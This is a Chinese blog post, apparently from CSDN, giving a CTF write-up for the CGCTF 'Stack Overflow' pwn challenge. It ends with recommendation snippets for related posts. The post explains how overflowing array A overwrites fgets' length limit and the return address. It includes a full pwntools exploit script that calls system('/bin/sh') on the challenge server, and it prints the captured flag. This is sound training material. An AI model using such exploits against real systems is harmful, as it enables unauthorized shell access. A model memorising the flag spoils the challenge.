18.9.16 PWN2----Stack Overflow

最新推荐文章于 2021-12-05 16:31:59 发布
原创 最新推荐文章于 2021-12-05 16:31:59 发布 · 498 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Pwn #Stack Overflow #cgctf

本文深入解析CGCTF竞赛中的CGPwna题目,详细介绍了利用fgets函数越界漏洞进行缓冲区覆盖攻击的方法,通过修改n值实现对pwnme函数的调用,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

还是cgctf的题目

拖进IDA

来说一说fgets(..)函数 原型  char *  fgets(char * s, int n,FILE *stream);

参数:

s: 字符型指针,指向存储读入数据的缓冲区的地址;

n: 从流中读入n-1个字符;

stream : 指向读取的流。

我们可以看到main中有两个函数,menu和message,(函数列表中还有pwnme函数,这就是我们应该要指向的对象)

先看menu函数

这个函数就是让你选择要干嘛,结合choice!=49就是说你不选“1”就不能输入字符串

然后来看message函数

理论上fgets函数其安全性很高,是无法溢出的,这里定死其范围是n=10

但是我们观察第一个fgets函数的参数

我们可以发现通过越界数组A,可以修改n的值,那就可以修改缓冲区了

还有一个问题,怎么把pwnme函数调出来,我们可以看到函数里是一个system类型的调用,直接指向其地址就好了,把返回的ebo覆盖掉,s的位置是[ebp-30],我们覆盖到0x34个字节(保存的ebp还占用四个字节),然后修改返回地址

因为system之后的call函数是需要一个返回地址,所以函数调用时要多压入一个returnaddress,然后才是command,所以还是需要四个字节的偏移

脚本:

# coding=utf-8
from pwn import *
#conn=process('./cgpwna')
conn=remote('182.254.217.142',10001)
conn.recvuntil('your choice:\n')
conn.sendline('1')
payload='a'*40+p32(0x80)+'/bin/sh'     #exploit the bss
conn.recvuntil('you can leave some message here:\n')
conn.sendline(payload)
elf=ELF('./cgpwna')
sysadr=elf.symbols['system']            #find the adr of system
payload2='a'*0x34+p32(sysadr)+'a'*0x04+p32(0x0804A080+44)
conn.recvuntil('your name please:\n')
conn.sendline(payload2)
conn.interactive()



#flag{Naya_chyo_ma_thur_meh_lava_ma_puoru}

拿到权限后,flag在home->pwn文件加中

 

 

 

 

 

 

南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 732
终于开始学pwn了…今天第一次做出来这题,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
PWN入门之Stack Overflow
2401_84434570的博客
05-06 1108
看一下正常情况,如果是正常情况的话,会返回到main函数中,这里需要注意一个细节,EIP这个寄存器,计算机会执行EIP指向的东西。根据这个原理,就可以进行构造,当ret的时候,EIP指向的东西为success函数的地址即可,这样就可以调用success函数了,从而达到劫持程序流的目的。在本篇文章中,我详细介绍了如何利用程序中本身存在的栈溢出漏洞,达到劫持程序流的目的,进而实现system("/bin/sh")的效果,如果你也对这个知识点感兴趣,欢迎阅读全文,内容篇幅较长,阅读时长约12分钟。
Windows Pwn - stack overflow
dengzhasong7076的博客
10-05 447
测试环境: windows xp 测试代码: #include <stdio.h> #include <windows.h> #define PASSWORD "1234567" int verify_password(char *password){ int authenticated; char buffer[44]; // local buf...
攻防世界PWNstackoverflow(栈溢出盲打)题解
seaaseesa的博客
01-28 2391
Stackoverflow 这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。 首先,就是确定栈溢出的长度 我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。 接下来,就是泄露栈数据了,主要依靠功能3,它会把数组里的数据相邻的去重后...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 598
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwndbg-2025.05.30-amd64.deb
最新发布
07-19
pwndbg-2025.05.30-amd64.deb
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2685
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 872
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1124
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
stack overflow ROP
我多么希望明天有太阳,来灼烧我腐烂的梦想
09-05 525
ROP: Return Oriented Programming CTFs -fno-stack-protector 指的是不开启堆栈溢出保护,即不生成 canary。 checksec stack_example Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found N...
ssctf-pwn2从此入坑不在起
BadRer的博客
05-30 1297
说来惭愧,做了这么就才终于将这道简单的栈溢出做出来了。而且还是在师傅的多次帮助下。找了一天的漏洞。刚开始一直以为第一个scanf上有栈溢出,结果怎么调也调不出来,最后在师傅的指引下找到了溢出点,最终成功shell 。这是一个悲伤的故事。好多的基础的东西都忘光了。连linux_server需要使用root权限运行都忘了。其实找到漏洞之后,后面的事情就变得简单了。但是对于我这种新手来说,在简单的事情也
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2...
CTF之PWN
博客
07-25 666
所需工具 工欲善其事,必先利其器。 IDA Windows下逆向分析工具。 GDB Linux下逆向分析工具。 Python中的pwntools库 参考资料 《程序员的自我修养——链接、装载与库》,俞甲子、石凡、潘爱民 著 ...
南京邮电大学 CTF 逆向部分 Writeup
weixin_30785593的博客
01-07 300
Hello,RE! 提示 IDA 中按 R 。 Google 到 IDA 中 R 快捷键是 Character ,转为字符串。 丢进 IDA(虽然我并不会使用 IDA 有个 strcmp 函数,比较 v4 和 v5 地址的。选中 v5 ,发现倒序的 flag 字样。 得到 Flag 为 flag{Welcome_To_RE_World!} ReadAsm2 main函数部分: int main(...
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5678
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
CG-CTF Stack Overflowpwn
苗_的博客
02-24 827
首先先拿到ida里面看一下,找一下溢出点 点进去A发现是一个大小为40的数组(0x28),但是可以接受64个字符,所以这里是第一个溢出点。 下面是对s进行输入,限制是n,点开n会发现n就在A的下面。 所以思路就是:我们可以通过溢出A来达到覆盖n的效果 然后我们点开pwnme函数会发现system函数,搜索字符串发现没有‘/bin/sh’,所以需要我们自己写入bss段。 exp: f...
攻防世界pwn pwn-100
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote(&#39;challenge.ctf.games&#39;, PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b&#39;A&#39; * offset return_address = pack(&#39;<I&#39;, 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值